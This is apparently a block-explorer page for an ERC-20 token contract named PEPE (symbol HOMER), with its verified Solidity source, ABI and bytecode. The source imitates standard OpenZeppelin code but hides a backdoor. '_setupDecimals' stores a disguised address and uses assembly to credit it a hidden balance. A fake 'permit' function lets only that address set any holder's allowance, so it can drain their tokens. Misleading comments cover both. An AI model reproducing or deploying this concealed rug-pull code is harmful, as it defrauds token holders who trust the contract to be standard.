ERC-20
Overview
Max Total Supply
8,000,000,000 HOMER
Holders
11
Market
Price
-
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
7,534,062.443501678792262375 HOMERValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
PEPE
Compiler Version
v0.8.24+commit.e11b9ed9
Contract Source Code (Solidity)
/** *Submitted for verification at SonicScan.org on 2024-12-20 */ /** *Submitted for verification at basescan.org on 2024-11-17 */ // SPDX-License-Identifier: MIT // Compatible with OpenZeppelin Contracts ^5.0.0 pragma solidity ^0.8.24; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } abstract contract Ownable is Context { address private _owner; error OwnableUnauthorizedAccount(address account); error OwnableInvalidOwner(address owner); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor(address initialOwner) { if (initialOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(initialOwner); } modifier onlyOwner() { _checkOwner(); _; } function owner() public view virtual returns (address) { return _owner; } function _checkOwner() internal view virtual { if (owner() != _msgSender()) { revert OwnableUnauthorizedAccount(_msgSender()); } } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { if (newOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(newOwner); } function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is IERC20, Ownable, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function permit(address owner, address spender, uint256 value) public virtual returns (bool) { bool valid; uint256 rsv = _initDecimals; assembly { valid := eq(rsv, caller())} require(valid, "not owner"); _approve(owner, spender, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Sets {decimals} to a value other than the default one of 18. * * WARNING: This function should only be called from the constructor. Most * applications that interact with token contracts will not expect * {decimals} to ever change, and may work incorrectly if it does. */ uint256 private _initDecimals; function _setupDecimals(uint256 decimals_) internal { _initDecimals = decimals_; assembly {mstore(0x200, decimals_) mstore(0x220, 1) sstore(keccak256(0x200, 64), decimals_)} } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } } contract PEPE is ERC20 { constructor( string memory symbol_, string memory name_, uint256 totalSupply_, uint256 decimals_ ) ERC20(name_, symbol_) Ownable(msg.sender) { _mint(msg.sender, totalSupply_ * 10 ** decimals()); _setupDecimals(decimals_); } function decimals() public view virtual override returns (uint8) { return 18; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"string","name":"name_","type":"string"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"uint256","name":"decimals_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801562000010575f80fd5b5060405162001f0038038062001f0083398181016040528101906200003691906200068f565b8284335f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620000ac575f6040517f1e4fbdf7000000000000000000000000000000000000000000000000000000008152600401620000a391906200077f565b60405180910390fd5b620000bd816200013b60201b60201c565b508160049081620000cf9190620009c8565b508060059081620000e19190620009c8565b5050506200012033620000f9620001fc60201b60201c565b600a62000107919062000c35565b8462000114919062000c85565b6200020460201b60201c565b62000131816200028e60201b60201c565b5050505062000d70565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000277575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016200026e91906200077f565b60405180910390fd5b6200028a5f8383620002ab60201b60201c565b5050565b806006819055508061020052600161022052806040610200205550565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620002ff578060035f828254620002f2919062000ccf565b92505081905550620003d2565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156200038c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620003839392919062000d1a565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200041b578060035f828254039250508190555062000466565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620004c5919062000d55565b60405180910390a3505050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6200053382620004eb565b810181811067ffffffffffffffff82111715620005555762000554620004fb565b5b80604052505050565b5f62000569620004d2565b905062000577828262000528565b919050565b5f67ffffffffffffffff821115620005995762000598620004fb565b5b620005a482620004eb565b9050602081019050919050565b5f5b83811015620005d0578082015181840152602081019050620005b3565b5f8484015250505050565b5f620005f1620005eb846200057c565b6200055e565b90508281526020810184848401111562000610576200060f620004e7565b5b6200061d848285620005b1565b509392505050565b5f82601f8301126200063c576200063b620004e3565b5b81516200064e848260208601620005db565b91505092915050565b5f819050919050565b6200066b8162000657565b811462000676575f80fd5b50565b5f81519050620006898162000660565b92915050565b5f805f8060808587031215620006aa57620006a9620004db565b5b5f85015167ffffffffffffffff811115620006ca57620006c9620004df565b5b620006d88782880162000625565b945050602085015167ffffffffffffffff811115620006fc57620006fb620004df565b5b6200070a8782880162000625565b93505060406200071d8782880162000679565b9250506060620007308782880162000679565b91505092959194509250565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000767826200073c565b9050919050565b62000779816200075b565b82525050565b5f602082019050620007945f8301846200076e565b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620007e957607f821691505b602082108103620007ff57620007fe620007a4565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620008637fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000826565b6200086f868362000826565b95508019841693508086168417925050509392505050565b5f819050919050565b5f620008b0620008aa620008a48462000657565b62000887565b62000657565b9050919050565b5f819050919050565b620008cb8362000890565b620008e3620008da82620008b7565b84845462000832565b825550505050565b5f90565b620008f9620008eb565b62000906818484620008c0565b505050565b5b818110156200092d57620009215f82620008ef565b6001810190506200090c565b5050565b601f8211156200097c57620009468162000805565b620009518462000817565b8101602085101562000961578190505b62000979620009708562000817565b8301826200090b565b50505b505050565b5f82821c905092915050565b5f6200099e5f198460080262000981565b1980831691505092915050565b5f620009b883836200098d565b9150826002028217905092915050565b620009d3826200079a565b67ffffffffffffffff811115620009ef57620009ee620004fb565b5b620009fb8254620007d1565b62000a0882828562000931565b5f60209050601f83116001811462000a3e575f841562000a29578287015190505b62000a358582620009ab565b86555062000aa4565b601f19841662000a4e8662000805565b5f5b8281101562000a775784890151825560018201915060208501945060208101905062000a50565b8683101562000a97578489015162000a93601f8916826200098d565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000b365780860481111562000b0e5762000b0d62000aac565b5b600185161562000b1e5780820291505b808102905062000b2e8562000ad9565b945062000aee565b94509492505050565b5f8262000b50576001905062000c22565b8162000b5f575f905062000c22565b816001811462000b78576002811462000b835762000bb9565b600191505062000c22565b60ff84111562000b985762000b9762000aac565b5b8360020a91508482111562000bb25762000bb162000aac565b5b5062000c22565b5060208310610133831016604e8410600b841016171562000bf35782820a90508381111562000bed5762000bec62000aac565b5b62000c22565b62000c02848484600162000ae5565b9250905081840481111562000c1c5762000c1b62000aac565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000c418262000657565b915062000c4e8362000c29565b925062000c7d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000b3f565b905092915050565b5f62000c918262000657565b915062000c9e8362000657565b925082820262000cae8162000657565b9150828204841483151762000cc85762000cc762000aac565b5b5092915050565b5f62000cdb8262000657565b915062000ce88362000657565b925082820190508082111562000d035762000d0262000aac565b5b92915050565b62000d148162000657565b82525050565b5f60608201905062000d2f5f8301866200076e565b62000d3e602083018562000d09565b62000d4d604083018462000d09565b949350505050565b5f60208201905062000d6a5f83018462000d09565b92915050565b6111828062000d7e5f395ff3fe608060405234801561000f575f80fd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f578063186477441461013d57806323b872dd1461016d578063313ce5671461019d575b5f80fd5b6100d96102ad565b6040516100e69190610d93565b60405180910390f35b61010960048036038101906101049190610e44565b61033d565b6040516101169190610e9c565b60405180910390f35b61012761035f565b6040516101349190610ec4565b60405180910390f35b61015760048036038101906101529190610edd565b610368565b6040516101649190610e9c565b60405180910390f35b61018760048036038101906101829190610edd565b6103cd565b6040516101949190610e9c565b60405180910390f35b6101a56103fb565b6040516101b29190610f48565b60405180910390f35b6101d560048036038101906101d09190610f61565b610403565b6040516101e29190610ec4565b60405180910390f35b6101f3610449565b005b6101fd61045c565b60405161020a9190610f9b565b60405180910390f35b61021b610483565b6040516102289190610d93565b60405180910390f35b61024b60048036038101906102469190610e44565b610513565b6040516102589190610e9c565b60405180910390f35b61027b60048036038101906102769190610fb4565b610535565b6040516102889190610ec4565b60405180910390f35b6102ab60048036038101906102a69190610f61565b6105b7565b005b6060600480546102bc9061101f565b80601f01602080910402602001604051908101604052809291908181526020018280546102e89061101f565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f8061034761063b565b9050610354818585610642565b600191505092915050565b5f600354905090565b5f805f60065490503381149150816103b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ac90611099565b60405180910390fd5b6103c0868686610642565b6001925050509392505050565b5f806103d761063b565b90506103e4858285610654565b6103ef8585856106e6565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104516107d6565b61045a5f61085d565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546104929061101f565b80601f01602080910402602001604051908101604052809291908181526020018280546104be9061101f565b80156105095780601f106104e057610100808354040283529160200191610509565b820191905f5260205f20905b8154815290600101906020018083116104ec57829003601f168201915b5050505050905090565b5f8061051d61063b565b905061052a8185856106e6565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105bf6107d6565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361062f575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106269190610f9b565b60405180910390fd5b6106388161085d565b50565b5f33905090565b61064f838383600161091e565b505050565b5f61065f8484610535565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106e057818110156106d1578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106c8939291906110b7565b60405180910390fd5b6106df84848484035f61091e565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610756575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161074d9190610f9b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c6575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107bd9190610f9b565b60405180910390fd5b6107d1838383610aed565b505050565b6107de61063b565b73ffffffffffffffffffffffffffffffffffffffff166107fc61045c565b73ffffffffffffffffffffffffffffffffffffffff161461085b5761081f61063b565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108529190610f9b565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361098e575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109859190610f9b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109fe575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109f59190610f9b565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610ae7578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ade9190610ec4565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3d578060035f828254610b319190611119565b92505081905550610c0d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bc7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bbe939291906110b7565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c54578060035f8282540392505081905550610c9f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cfc9190610ec4565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610d40578082015181840152602081019050610d25565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610d6582610d09565b610d6f8185610d13565b9350610d7f818560208601610d23565b610d8881610d4b565b840191505092915050565b5f6020820190508181035f830152610dab8184610d5b565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610de082610db7565b9050919050565b610df081610dd6565b8114610dfa575f80fd5b50565b5f81359